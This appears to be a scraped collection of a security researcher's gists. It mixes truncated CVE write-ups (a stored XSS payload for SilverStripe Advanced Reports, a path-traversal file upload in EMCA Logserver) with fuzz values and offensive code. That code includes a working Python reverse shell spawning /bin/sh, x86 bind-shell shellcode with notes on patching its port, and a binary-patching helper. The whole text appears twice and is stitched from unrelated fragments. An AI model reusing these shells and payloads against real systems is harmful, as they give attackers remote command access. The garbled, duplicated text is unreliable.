Maciej Domanski ahpaleus

## CVE-2020-25140.txt
CVE - CVE-2020-25140
------------------------------------------
Cross Site Scripting in contacts

------------------------------------------
[Description]
Penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it.
------------------------------------------

[Additional Information]

## CVE-2020-25102.txt
CVE-2020-25102 - Cross Site Scripting (XSS) - SilverStripe Advanced Reports Module

SilverStripe Advanced Reports Module (aka silverstripe-advancedreports) 1.0 through 2.0 is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it. The affects: admin/advanced-reports/DataObjectReport/EditForm/field/DataObjectReport/item (aka report preview), when an SVG document is provided in the Description parameter.

To exploit vulnerability, attacker has to change send malicious request to store JavaScript payload within it.

Request to the server:
Request (with <svg onx=() onload=(confirm)(1)payload in Description parameter)

GET /admin/advanced-reports/DataObjectReport/EditForm/field/DataObjectReport/item/4054/ItemEditForm?action_reportpreview=1&

## gist:ac51764ac8a4e056a613082ce698a858
"0.1111"
"-1.97684995314e+16"
"1.79769313486e+308"
"3.38800266804e+16"
"-1.97684995314e+16"
"-128"
"-129"
"-139333426276771806651771"
"-2147483648"
"-2147483649"

## php_cli.c
/*
   +----------------------------------------------------------------------+
   | PHP Version 7                                                        |
   +----------------------------------------------------------------------+
   | Copyright (c) The PHP Group                                          |
   +----------------------------------------------------------------------+
   | This source file is subject to version 3.01 of the PHP license,      |
   | that is bundled with this package in the file LICENSE, and is        |
   | available through the world-wide-web at the following url:           |
   | http://www.php.net/license/3_01.txt                                  |

## gist:effb46d4a9d9c2b9a452c98f64ddc2c7
CVE-2019-14521 - Arbitrary File Upload

The Logo File upload feature in EMCA Energy Logserver 6.1.2 allows attackers to send any kind of file to any location on the server via path traversal in the filename parameter.

To exploit vulnerability, attacker has to change "filename" parameter and put malicious content into file (for example - reverse shell in node.js). Attacker can use path traversal to locate file anywhere.

Request to the server:
POST /api/admin/logoupload HTTP/1.1
Host: XXXXXXXXXXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0

## wrapper.py
import sys
import socket
import binascii
import os

port = sys.argv[2]
ip = sys.argv[1]
if (len(sys.argv) is not 3) or (int(port) > 65535) or (int(port) < 1):

	print "Usage: {0} IP PORT (1-65535)".format(sys.argv[0])

## reverse.nasm
global _start

section .text

_start:
	xor eax, eax
	xor ebx, ebx
	xor ecx, ecx
	xor edx, edx

## reverse_shell.py
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",1337))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

## binwrap.py
d = bytearray(open("bind_socket_loop", "rb").read())

d[0x7d] = 0xab
d[0x7e] = 0xcd

open("bind_socket_loop_wrapped", "wb").write(d)

## wrapper.py
'''
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc6\x66\xb8\x69\x01\x89\xf3\x52\x66\x68\x00\x80\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66\xb8\x6b\x01\x89\xf3\x31\xc9\xcd\x80\x56\x66\xb8\x6c\x01\x31\xf6\xcd\x80\x5e\xb1\x04\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xb8\x01\x00\x00\x00\xbb\x05\x00\x00\x00\xcd\x80

We need to get:
x00\x80
and set port (30 i 31 position)
		; 0x0080   80 we insert 8000

'''
	CVE - CVE-2020-25140
	------------------------------------------
	Cross Site Scripting in contacts

	------------------------------------------
	[Description]
	Penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it.
	------------------------------------------

	[Additional Information]
	CVE-2020-25102 - Cross Site Scripting (XSS) - SilverStripe Advanced Reports Module

	SilverStripe Advanced Reports Module (aka silverstripe-advancedreports) 1.0 through 2.0 is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it. The affects: admin/advanced-reports/DataObjectReport/EditForm/field/DataObjectReport/item (aka report preview), when an SVG document is provided in the Description parameter.

	To exploit vulnerability, attacker has to change send malicious request to store JavaScript payload within it.

	Request to the server:
	Request (with <svg onx=() onload=(confirm)(1)payload in Description parameter)

	GET /admin/advanced-reports/DataObjectReport/EditForm/field/DataObjectReport/item/4054/ItemEditForm?action_reportpreview=1&
	"0.1111"
	"-1.97684995314e+16"
	"1.79769313486e+308"
	"3.38800266804e+16"
	"-1.97684995314e+16"
	"-128"
	"-129"
	"-139333426276771806651771"
	"-2147483648"
	"-2147483649"
	/*
	+----------------------------------------------------------------------+
	\| PHP Version 7 \|
	+----------------------------------------------------------------------+
	\| Copyright (c) The PHP Group \|
	+----------------------------------------------------------------------+
	\| This source file is subject to version 3.01 of the PHP license, \|
	\| that is bundled with this package in the file LICENSE, and is \|
	\| available through the world-wide-web at the following url: \|
	\| http://www.php.net/license/3_01.txt \|
	CVE-2019-14521 - Arbitrary File Upload

	The Logo File upload feature in EMCA Energy Logserver 6.1.2 allows attackers to send any kind of file to any location on the server via path traversal in the filename parameter.

	To exploit vulnerability, attacker has to change "filename" parameter and put malicious content into file (for example - reverse shell in node.js). Attacker can use path traversal to locate file anywhere.

	Request to the server:
	POST /api/admin/logoupload HTTP/1.1
	Host: XXXXXXXXXXX
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
	import sys
	import socket
	import binascii
	import os

	port = sys.argv[2]
	ip = sys.argv[1]
	if (len(sys.argv) is not 3) or (int(port) > 65535) or (int(port) < 1):

	print "Usage: {0} IP PORT (1-65535)".format(sys.argv[0])
	global _start

	section .text

	_start:
	xor eax, eax
	xor ebx, ebx
	xor ecx, ecx
	xor edx, edx
	import socket,subprocess,os

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(("127.0.0.1",1337))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	p=subprocess.call(["/bin/sh","-i"])
	d = bytearray(open("bind_socket_loop", "rb").read())

	d[0x7d] = 0xab
	d[0x7e] = 0xcd

	open("bind_socket_loop_wrapped", "wb").write(d)
	'''
	\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc6\x66\xb8\x69\x01\x89\xf3\x52\x66\x68\x00\x80\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66\xb8\x6b\x01\x89\xf3\x31\xc9\xcd\x80\x56\x66\xb8\x6c\x01\x31\xf6\xcd\x80\x5e\xb1\x04\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xb8\x01\x00\x00\x00\xbb\x05\x00\x00\x00\xcd\x80

	We need to get:
	x00\x80
	and set port (30 i 31 position)
	; 0x0080 80 we insert 8000

	'''